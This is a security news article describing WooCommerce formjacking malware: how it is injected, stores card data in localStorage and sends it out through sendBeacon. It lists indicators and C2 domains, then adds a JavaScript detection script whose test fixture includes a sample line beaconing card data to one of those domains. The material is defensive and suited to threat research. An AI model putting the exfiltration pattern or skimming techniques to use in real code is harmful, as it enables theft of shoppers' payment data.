New Formjacking Malware Targets E-Commerce Sites to Steal Credit Card Data

A disturbing new formjacking malware has emerged, specifically targeting WooCommerce-based e-commerce sites to steal sensitive credit card information, as recently uncovered by the Wordfence Threat Intelligence team.

Unlike conventional card skimmers that overlay fake forms on checkout pages, this malware seamlessly integrates into the legitimate payment workflow of WooCommerce sites, mimicking their design and functionality with alarming precision.

This sophisticated integration makes it nearly impossible for both site owners and customers to detect the malicious activity, as the injected payment form appears professional, complete with styled HTML elements, familiar fields for card details, and even SVG icons resembling legitimate payment card graphics.

[Figure: Data Exfiltration Flow]

Sophisticated Attack on WooCommerce Platforms

The malware operates by injecting malicious JavaScript that visually blends with legitimate code through professional formatting and conventional syntax, evading casual inspection.

It activates on checkout pages, identified via URL checks, and uses the browser’s localStorage to persistently store stolen data like card numbers, expiration dates, and CVVs, alongside personal information such as names, addresses, and emails.

This persistence ensures data remains accessible even across browser sessions or interruptions, while a clever anti-forensic design delays exfiltration to obscure timelines of theft.

The script employs the navigator.sendBeacon() API for silent, non-blocking data transmission to remote Command & Control (C2) servers, bypassing CORS preflight checks and leaving minimal traces in browser tools or site logs.

Technical Breakdown of the Malware Mechanics

Continuously monitoring form fields via multiple setInterval() calls, the malware captures input in real-time, ensuring data is harvested even if a transaction isn’t completed.


The infection likely stems from compromised WordPress admin accounts, with malicious code injected via plugins like Simple Custom CSS and JS, exploiting database-stored settings or cached pages for dynamic insertion.

Initial findings suggest the compromise vector involves unauthorized access to administrative privileges, followed by the insertion of malicious JavaScript through plugins that permit custom code.

Cached files revealed comments hinting at plugin misuse rather than inherent vulnerabilities, with the malware predominantly residing in cached pages or database entries.

This dynamic injection method, bypassing traditional PHP-based infections, underscores the evolving nature of web threats.

According to the report, the Wordfence team responded swiftly, developing a detection signature on April 25, 2025, releasing it to Premium users on May 6, and making it available to free users on June 5.

Their database, boasting over 4.3 million malicious samples, aids in blocking over 99% of such threats via plugins and CLI scanners.

For protection, users are urged to leverage browser extensions like uBlock Origin, inspect network activity during checkout, use virtual or disposable payment methods, monitor bank statements, and clear browser data post-transaction.

This malware represents a chilling evolution in formjacking tactics, exploiting legitimate web technologies to undermine user security with unparalleled stealth.

Indicators of Compromise (IoCs)

Indicator                        Description
navigator.sendBeacon() Usage     API calls to external domains during checkout
Unexpected JavaScript            Unrecognized scripts on checkout pages
Unusual localStorage Activity    Storage of payment data in browser localStorage
Multiple setInterval() Calls     Continuous monitoring of billing form fields
Involved Domains                 searchpixelstuff.top, justmerikschill.top, pinkmanpixel.top, schoolmeriks.top
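As an added example (not code from the article or from Wordfence), the following static triage check scans a stored custom-JavaScript entry for the combination of indicators in the table above: known C2 domains, navigator.sendBeacon() alongside a non-allowlisted host, localStorage writes under payment-looking keys, and repeated setInterval() polling. The allowlist hostname shop.example, the function names and both sample snippets are constructed assumptions.

```javascript
// Added example, not the article's code; allowlist hosts are assumed caller input.
const KNOWN_BAD_DOMAINS = [ // domains from the article's IoC table
  "searchpixelstuff.top", "justmerikschill.top",
  "pinkmanpixel.top", "schoolmeriks.top",
];
const PAYMENT_KEY = /card|cvv|cvc|expir|billing/i; // payment-looking storage keys

function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

function triageScript(source, allowedHosts = []) {
  const findings = [];
  const allow = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const hosts = extractHosts(source);
  const bad = hosts.filter((h) => KNOWN_BAD_DOMAINS.includes(h));
  if (bad.length) findings.push(`known C2 domain: ${bad.join(", ")}`);

  // sendBeacon() plus a host outside the allowlist; the destination may be
  // assembled at runtime, so any non-allowlisted host in the script counts.
  if (/navigator\.sendBeacon\s*\(/.test(source)) {
    const ext = hosts.filter((h) => !allow.has(h));
    if (ext.length) findings.push(`sendBeacon with external host: ${ext.join(", ")}`);
  }

  // localStorage writes under payment-looking keys
  for (const m of source.matchAll(/localStorage\.setItem\s*\(\s*["'`]([^"'`]+)/g)) {
    if (PAYMENT_KEY.test(m[1])) findings.push(`payment-like localStorage key: ${m[1]}`);
  }

  // repeated setInterval() polling of form fields
  const intervals = (source.match(/setInterval\s*\(/g) || []).length;
  if (intervals >= 2) findings.push(`${intervals} setInterval() calls`);

  // A single indicator is common in benign code; two or more warrant review.
  return { suspicious: findings.length >= 2, findings };
}

// Constructed, non-functional fragment mirroring the IoC table.
const SAMPLE_SUSPICIOUS_JS = `setInterval(pollBilling, 500); setInterval(pollCard, 700);
localStorage.setItem("cc_cardNumber", value);
navigator.sendBeacon("https://searchpixelstuff.top/collect", payload);`;

// Constructed benign snippet: a first-party analytics beacon only.
const SAMPLE_BENIGN_JS =
  `addEventListener("pagehide", () => navigator.sendBeacon("https://shop.example/m", "{}"));`;
```

Run it over the entries a custom-code plugin stores in the database and over cached checkout pages, passing the shop's own hostnames as the allowlist.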
